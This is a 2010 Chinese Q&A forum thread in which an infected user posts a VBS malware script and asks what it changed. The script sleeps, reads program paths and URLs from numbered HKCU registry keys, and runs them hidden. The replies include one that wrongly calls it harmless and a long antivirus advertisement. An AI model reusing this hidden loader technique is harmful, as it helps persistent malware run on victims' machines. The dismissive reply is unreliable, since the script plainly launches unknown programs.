• 新记

    • 高分悬赏 高手帮忙看一下这个VBS病毒文件

    电脑中了这种弱智病毒 找到了病毒的VBS文件 看不懂 高手帮忙看看它都修改了我的那些地方 我如何改过来 不胜感激
    Set b= WScript.CreateObject("WScript.Shell")
    On Error Resume Next
    wscript.sleep 300000
    Const HKEY_CLASSES_ROOT = &H80000000
    Const HKEY_CURRENT_USER = &H80000001
    Const HKEY_LOCAL_MACHINE = &H80000002
    Const HKEY_Users = &H80000003
    Const HKEY_Current_Config = &H80000005
    Const REG_SZ = 1
    strComputer = "."
    strKeysRoot = HKEY_CURRENT_USER
    Set dd=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
    strKeysPath = "Software\Microsoft\Windows\CurrentVersion\18926"
    Regpath = "HKEY_CURRENT_USER"
    Const REG_EXPAND_SZ = 2
    wscript.sleep 150000
    Const REG_BINARY = 3
    Const REG_DWORD = 4
    Const REG_MULTI_SZ = 7
    Const KEY_QUERY_VALUE = &H0001
    Const KEY_SET_VALUE = &H0002
    Const KEY_CREATE_SUB_KEY = &H0004
    Const DELETE = &H00010000
    dd.GetStringValue strKeysRoot, strKeysPath,"yzabc" , strSaves
    dd.GetStringValue strKeysRoot, strKeysPath,"dde" , strURLs
    wscript.sleep 150000
    b.run """" & strSaves & """" & " " & strURLs,vbHide

    strKeysPath = "Software\Microsoft\Windows\CurrentVersion\26232"
    Regpath = "HKEY_CURRENT_USER"
    Const REG_EXPAND_SZ = 2
    wscript.sleep 150000
    Const REG_BINARY = 3
    Const REG_DWORD = 4
    Const REG_MULTI_SZ = 7
    Const KEY_QUERY_VALUE = &H0001
    Const KEY_SET_VALUE = &H0002
    Const KEY_CREATE_SUB_KEY = &H0004
    Const DELETE = &H00010000
    dd.GetStringValue strKeysRoot, strKeysPath,"vwsa" , strSaves
    dd.GetStringValue strKeysRoot, strKeysPath,"ssxxy" , strURLs
    wscript.sleep 150000
    b.run """" & strSaves & """" & " " & strURLs,vbHide

    strKeysPath = "Software\Microsoft\Windows\CurrentVersion\76759"
    Regpath = "HKEY_CURRENT_USER"
    Const REG_EXPAND_SZ = 2
    wscript.sleep 150000
    Const REG_BINARY = 3
    Const REG_DWORD = 4
    Const REG_MULTI_SZ = 7
    Const KEY_QUERY_VALUE = &H0001
    Const KEY_SET_VALUE = &H0002
    Const KEY_CREATE_SUB_KEY = &H0004
    Const DELETE = &H00010000
    dd.GetStringValue strKeysRoot, strKeysPath,"ssxx" , strSaves
    dd.GetStringValue strKeysRoot, strKeysPath,"z" , strURLs
    wscript.sleep 150000
    b.run """" & strSaves & """" & " " & strURLs,vbHide
    我不用360的 感觉很占资源 用的是Microsoft Security Essentials 现在想手动改过来 劳烦高手指出具体修改的地方 谢了

    举报该文章
    相关建议   2010-08-09
    用 vbs病毒专杀。
    温馨提示:内容为网友见解,仅供参考
    其他看法
    第1个回答  2010-08-05
    没有大的问题
    只是加了个版本号
    启动项的注册表
    没有意义的做法
    用360就可以修复的
    第2个回答  2010-08-05
    注册表和开机程序~改回来是什么意思?用杀毒软件后在用360安全卫士修复就可拉~
    第3个回答  2010-08-06
    这种东西用杀毒软件就好啦,在一个,好心提醒你,若是经常接触病毒,最好安装“一键还原精灵”
    第4个回答  2010-08-06
    电脑有病毒木马,可以使用可牛免费杀毒进行双查杀,国际品质的卡巴斯基杀毒引擎(KAV8.0)+高效轻巧云引擎,海量反病毒数据库,双剑合璧,彻底解决:木马、病毒、流氓软件、恶意网址等一系列问题。

    可牛免费杀毒特色:

    * 无需卡巴斯基2010激活码,免费用卡巴斯基引擎

    全球领先的卡巴斯基引擎,无需激活,安装后即刻使用,专业品质保证。

    * 国际领先双引擎,超强查杀

    卡巴斯基杀毒引擎+快速云引擎,海量反病毒数据库,精准查杀各种流行病毒木马。

    * 超强保护,阻止病毒入侵

    超强保护模式,四大高级防御功能,有效防止一切病毒的入侵,保护电脑安全。

    * 独创双杀软保护模式

    实时保护双杀软模式,完美兼容传统杀毒软件,多加一个杀软更安全。

    * 快速升级及时更新新功能

    本地病毒库每小时升级,云安全中心7*24小时高速流转,精准查杀病毒木马。

    * 修复漏洞、全方位保护

    快速检测系统、软件漏洞,及时提醒智能修复,从根源上关闭病毒入侵的大门。

    可牛免费杀毒采用了具备国际品质的卡巴斯基杀毒引擎(KAV8.0)+高效轻巧云引擎,海量反病毒数据库,双剑合璧,病毒木马通杀,是一款真正无需卡巴斯基2010激活码的免费卡巴斯基杀毒软件。

    可牛杀毒软件免费下载后可以使用的的病毒查杀方式分为了“快速查杀/全盘扫描/自定义扫描”三种类型。在右侧则有“实时保护状态/安全状况/文件隔离区/专杀工具推荐”这四类信息。

    可牛免费杀毒采用了双引擎同时查杀的形式。快速查杀的目标包括了“内存/服务与驱动/其他启动项/系统目录/临时目录”这几个病毒常驻之地。快速扫描速不错,在电脑中只需花费了51秒就能够扫描完毕。当用户进行二次扫描时,更会进行加速扫描,自动跳过已经认证为安全的文件,二次扫描用时2秒。“全盘扫描”目标则包含了“内存/服务与驱动/其他启动项/系统目录/临时目录/所有分区”, 扫描同样采取双引擎同时查杀。 更进一步的加强了对木马病毒的检出与清除能力!

    杀毒软件免费下载可信么?为何选用可牛杀毒?

    提供免费下载的可牛免费杀毒软件的安全品质绝对毋庸置疑,具备国际品质的卡巴反病毒引擎较之其他杀软已经具备了先天的优势,同时兼具使用云查杀这一全新的安全理念更加封堵住了传统杀软无法识别的最新病毒木马。

    可牛免费杀毒集成全球领先的卡巴斯基杀毒引擎、自主研发高效轻巧的云引擎,双剑合璧,完美清除病毒木马,无需激活,永久免费,兼容其他杀毒软件,更稳定、更安全。

    百度搜索:可牛免费杀毒
    相似回答
    大家正在搜
    相关问题
    winare.vbs病毒 跪求高手帮忙
    高分悬赏!装机高手帮忙看一下配置
    电脑病毒!!!急!!!!高手帮忙,,高分悬赏!!
    高手帮忙看一下这个耐克是真是假!高分悬赏!
    高分悬赏VB高手,帮忙看看哪里出错了!!
    高手帮忙看一下这个耐克是真是假!高分悬赏!
    高分悬赏请求电脑高手帮助:电脑一打字就死机,怎么办?